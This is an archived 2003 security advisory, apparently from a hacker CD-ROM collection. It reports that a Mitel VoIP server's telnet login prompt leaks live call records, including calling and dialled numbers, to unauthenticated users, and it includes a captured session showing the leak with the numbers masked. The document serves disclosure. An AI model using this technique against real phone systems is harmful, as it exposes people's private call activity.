home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / acmemitel / ACME-mitel.txt
Encoding:
Text File  |  2003-08-20  |  2.1 KB  |  64 lines

  1. There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:
  2.  
  3. Trying 192.168.1.2...
  4. Connected to 192.168.1.2.
  5. Escape character is '^]'. 
  6.  
  7. Username: mitel-cs018
  8. Password: 
  9.  
  10. ERROR: Invalid Username/Password pair 
  11.  
  12. Username:
  13. Password: 
  14.  
  15. Username: ^X^W^E^Q^W
  16. Password: 
  17.  
  18. ERROR: Invalid Username/Password pair 
  19.  
  20. Username: Password: 
  21.  
  22. ERROR: Invalid Username/Password pair 
  23.  
  24. # in this moment a foreign call arrive from outside
  25.  
  26. Username: 155 OGIN 149        11:11:55                        D 2
  27. 156 ICIN            11:12: 6                        D 4 0xxxXxxxxx
  28. 157 XFIC 156        11:12: 6 151            0: 9:47 D 3
  29. 158 ICIN            11:12: 6                        D 3 0xxxXxxxxx
  30. 159 ANSW 146        11:12:11                0: 0: 9 D 4
  31. 160 HDIN 146        11:12:21                        D 4
  32. 162 HREC 146        11:12:27                0: 0: 6 D 4
  33. 163 ABND ?          11:12:37                0: 0:37 D 3 0xxxXxxxxx
  34. 164 ICIN            11:12:43                        D 3 0xxxXxxxxx
  35. 165 EXIC 146        11:12:54                0: 0:47 D 4
  36. 166 ANSW 146        11:13: 0                0: 0:16 D 3
  37. 167 HDIN 146        11:13: 6                        D 3
  38. 169 EXIC 146        11:13:13        156     0: 0:12 D 3
  39. 171 EXOG 149        11:13:46                0: 1:59 D 2 0xxXxxxxx
  40. 172 XFIC 156        11:16:53 146            0: 3:40 D 3 
  41.  
  42. # where "0xxXxxxxx" are telephone numbers
  43.  
  44. A derives table results is:
  45.  
  46. SEQ CODE  EXT   ACC   TIME     RX     TX   DURATION LN    DIALLED DIGITS   COST
  47. No.       No.   COD HH:MM:SS  FROM    TO   HH:MM:SS No.
  48. ___ _____ ____ ____ ________  ____   ____  ____________   ______________  _______
  49.  
  50.  
  51.  
  52. So, it's too easy to know the telephonic's "movement" inside a lan that use this fucked system of VoIP.
  53.  
  54.  
  55. (an italian version of this advisory is available on olografix.org/acme/mitel.txt)
  56.  
  57.  
  58.  
  59.  
  60. acme
  61.  
  62. acme@paranoici DOT org
  63. acme@olografix DOT org
  64.